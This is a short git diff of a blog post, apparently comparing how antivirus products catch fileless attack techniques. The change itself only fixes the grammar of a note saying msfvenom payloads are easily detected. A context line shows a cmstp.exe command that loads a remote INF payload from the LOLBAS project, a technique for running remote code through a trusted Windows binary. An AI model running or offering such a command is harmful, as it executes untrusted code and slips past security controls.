spiritedwolf/fareedfauzi.github.io/_posts/2020-04-08-AV-Fileless-Comparison.md

 cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
 ```

 # Note
-Msvenom payload may easily detect by AV because of it's popularity used by many attacker and well recognized it pattern.
+Msvenom payload may easily detect by AV because of it's popularity used by many attacker and well recognized by its pattern.